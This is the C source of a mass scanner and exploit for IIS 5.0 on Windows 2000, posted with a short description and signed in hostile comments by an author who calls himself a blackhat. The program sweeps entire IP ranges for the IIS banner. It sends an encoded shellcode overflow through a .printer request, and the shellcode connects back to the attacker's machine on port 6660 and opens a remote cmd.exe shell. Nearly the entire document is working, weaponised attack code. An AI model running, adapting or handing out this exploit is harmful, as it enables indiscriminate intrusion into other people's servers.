IS 5.0 / Windows 2000 mass scanner / rooter which spawns a shell from a vulnerable system back over to the machine from where the attack is launched.
24f0ee8484f067e1f4b58579af1d7deca6ff9ef430a2ae999a08629bbc3e11c1
/*
mass IPP by rD of USG
fuck all you ./hack scriptkiddies
fuck all ./juno kids
greetz to my brother bobbyd1gital of FBH
ain't no one online like bobby to me!
ain't no one like Cc0d3r to me IRL
Inkubus stop posting advisories we are fucken blackhats not some brainwashed whitehats security industry slaves
shouts to v0id, NtWaK0, scut,c1sco, PHC and all the blackhats
the rap shit is eating my mind
rD of USG (UNIX Security Guards)
usg@africamail.com
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/errno.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
extern int errno;
#define LOCAL_IP "192.168.0.1" /* put your real ip here if you want to get the shell else you won't */
#define TIMEOUT 3
#define SHELL_TIMEOUT 6
#define BANNER "Microsoft-IIS/5.0"
#define SEND "HEAD / HTTP/1.0\r\n\r\n\r\n"
char server[500];
char *result;
void usage(char *);
void try(char *);
int jill(char *, char *);
static int i,x,y,z;
char A(char *);
char B(char *);
char C(char *);
char D(char *);
static char a[4],b[8],c[12],ip[17];
void shell(void);
/* main */
int main(int argc,char *argv[])
{
fprintf(stdout,"\n\n\t\t mass IPP for IIS/5.0 by rD\n\n");
if(argc != 3)
{
usage(argv[0]);
exit(-1);
}
while ((i = getopt (argc, argv, ":a:b:c:d:")) != EOF)
{
switch(i)
{
case 'h': usage(argv[1]);
break;
case 'a':
snprintf(a,sizeof(a),"%s",optarg);
A(a);
break;
case 'b': snprintf(b,sizeof(b),"%s",optarg);
B(b);
break;
case 'c': snprintf(c,sizeof(c),"%s",optarg);
C(c);
break;
case 'd':try(optarg);
break;
}
}
}
/* end of main */
/* A */
char A(char *Aclass)
{
if(strlen(Aclass)>3)
{
printf("wrong range");
exit(-1);
}
for(x=0;x<=255;++x)
{
for(y=0;y<=255;++y)
{
for(z=0;z<=255;++z)
{
snprintf(ip,sizeof(ip),"%s.%d.%d.%d",Aclass,x,y,z);
printf("trying %s\t->\t",ip);
try(ip);
}
}
}
}
/* end of A */
/* B */
char B(char *Bclass)
{
for(y=0;y<=255;++y)
{
for(z=0;z<=255;++z)
{
snprintf(ip,sizeof(ip),"%s.%d.%d",Bclass,y,z);
printf("trying %s\t->\t",ip);
try(ip);
}
}
}
/* end of B */
/* C */
char C(char *Cclass)
{
for(z=0;z<=255;++z)
{
if( !strcmp(ip,".4") ) exit(EXIT_FAILURE);
snprintf(ip,sizeof(ip),"%s.%d",Cclass,z);
printf("trying %s\t->\t",ip);
try(ip);
}
}
/* end of C */
/* try */
void try(char *IP)
{
int sock,errex;
int numbytes = 0 , opt;
struct sockaddr_in remote;
fd_set wset;
struct timeval tv;
close(sock);
sock = socket(AF_INET,SOCK_STREAM,0);
remote.sin_port = htons(80);
remote.sin_addr.s_addr = inet_addr(IP);
remote.sin_family= AF_INET;
memset(remote.sin_zero,0,sizeof(remote.sin_zero));
fflush(stdout);
if (sock == -1)
{
perror("socket creation error");
return;
}
FD_ZERO( &wset );
FD_SET( sock , &wset );
tv.tv_sec = TIMEOUT;
tv.tv_usec = 0;
if( fcntl( sock , F_SETFL , O_NONBLOCK ) == -1 )
{
perror("fcntl error");
return;
}
errex = connect(sock,(struct sockaddr *)&remote,sizeof(struct sockaddr));
if( errno != EINPROGRESS && errno != EISCONN )
{
perror("connection error");
return;
}
opt = select(sock+1,NULL,&wset,NULL,&tv);
if( fcntl( sock , F_SETFL , 0 ) == -1 )
{
perror("fcntl error");
return;
}
if( opt == -1 )
{
perror("select error");
return;
}
if( !opt )
{
printf("connection timed out..\n");
return;
}
numbytes = send(sock,SEND,sizeof(SEND),0);
if( numbytes == -1 )
{
perror("connection error");
return;
}
numbytes = recv(sock,server,sizeof(server),0);
if( numbytes == -1 )
{
perror("recv");
return;
}
server[numbytes]='\0';
if(strlen(server) == 0)
{
printf("connection closed\n");
return;
}
result = strstr(server,"Server:");
if( result == NULL)
{
printf("no server string found\n");
return;
}
*(strchr(result, '\n')) = '\0';
printf("%s\n",result);
if(strstr(result,BANNER) != NULL)
{
printf("exploiting ...\n");
jill(IP, LOCAL_IP);
}
else
if(strstr(result,BANNER) == NULL)
{
close(sock);
return;
}
close(sock);
}
/* end of try */
/* jill */
int jill(char *victim, char *attacker)
{
#define aport 6660
unsigned char sploit[]=
"\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20"
"\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x61\x76\x75\x68\x3a\x20"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
"\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
"\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";
int s;
unsigned short int a_port;
unsigned long a_host;
struct hostent *ht;
struct sockaddr_in sin;
if ((ht = gethostbyname(victim)) == NULL){
hstrerror(h_errno);
}
sin.sin_port = htons(80);
a_port = htons(aport);
a_port^=0x9595;
sin.sin_family = AF_INET;
sin.sin_addr = *((struct in_addr *)ht->h_addr);
if ((ht = gethostbyname(attacker)) == 0){
herror(attacker);
return;
}
a_host = *((unsigned long *)ht->h_addr);
a_host^=0x95959595;
sploit[441]= (a_port) & 0xff;
sploit[442]= (a_port >> 8) & 0xff;
sploit[446]= (a_host) & 0xff;
sploit[447]= (a_host >> 8) & 0xff;
sploit[448]= (a_host >> 16) & 0xff;
sploit[449]= (a_host >> 24) & 0xff;
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
perror("socket");
return;
}
printf("\nconnecting to %s\n",victim);
if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
perror("connect");
return;
}
write(s, sploit, strlen(sploit));
sleep (1);
close (s);
printf("shellcode excuted, waiting for shell...\n");
//call the shell here
shell();
return;
}
/* end of jill */
/* usage */
void usage(char *prog)
{
fprintf(stderr, "usage %s <-a> xxx\n"
" <-b> xxx.xxx\n"
" <-c> xxx.xxx.xxx\n"
" <-d> <hostname>\n",prog);
}
/* end of usgae */
/* start of shell */
void shell()
{
int recvsock , newsock , numbytes , size , opt;
char recvbuffer[2048];
fd_set rs , rsmaster , wset;
struct sockaddr_in local,incomming;
struct timeval tv;
size = sizeof( struct sockaddr );
recvsock = socket(AF_INET , SOCK_STREAM , 0 );
if( recvsock == -1 )
{
perror("socket creation error");
return;
}
local.sin_addr.s_addr = INADDR_ANY;
local.sin_port = htons(6660);
local.sin_family = AF_INET;
memset( local.sin_zero , 0 , sizeof(local.sin_zero) );
if( ( bind(recvsock , (struct sockaddr *)&local , sizeof(struct sockaddr) )
) == -1 )
{
perror("bind error");
return;
}
if( listen(recvsock , 10 ) == -1 )
{
perror("listen error");
return;
}
FD_ZERO( &rsmaster );
FD_ZERO( &wset );
FD_SET( recvsock , &wset );
tv.tv_sec = SHELL_TIMEOUT;
tv.tv_usec = 0;
if( fcntl( recvsock , F_SETFL , O_NONBLOCK ) == -1 )
{
perror("fcntl error");
return;
}
newsock = accept( recvsock , (struct sockaddr *)&incomming , &size);
opt = select( recvsock+1 , &rsmaster , NULL , NULL , &tv );
if( opt == -1 )
{
perror("select error");
return;
}
if( !opt )
{
printf("damn it's patched!\n");
close(newsock);
close(recvsock);
return;
}
if( fcntl( recvsock , F_SETFL , 0 ) == -1 )
{
perror("fcntl error");
return;
}
printf("Incomming connection from %s\n",inet_ntoa(incomming.sin_addr));
printf("Spawning cmd.exe\n\n");
if( newsock == -1 )
{
perror("accept error");
return;
}
while(1)
{
rs = rsmaster;
FD_SET( newsock , &rsmaster );
FD_SET( 0 , &rsmaster );
opt = select( newsock + 1 , &rs , NULL , NULL , NULL );
if( opt == -1 )
{
perror("select error");
return;
}
if( FD_ISSET( 0 , &rs ) )
{
fgets(recvbuffer,sizeof(recvbuffer)-1,stdin);
snprintf(recvbuffer,sizeof(recvbuffer),"%s\r\n",recvbuffer);
numbytes = send(newsock , recvbuffer , strlen(recvbuffer) , 0);
if( numbytes == -1 )
{
perror("send error");
return;
}
}
else if( FD_ISSET( newsock , &rs ) )
{
numbytes = recv( newsock , recvbuffer , sizeof(recvbuffer) - 1 , 0 );
if( numbytes == -1 )
{
perror("recv error");
return;
}
recvbuffer[numbytes-2] = '\n';
recvbuffer[numbytes-1] = 0x0;
printf("%s",recvbuffer);
}
}
}
/* end of shell */
/* EOF */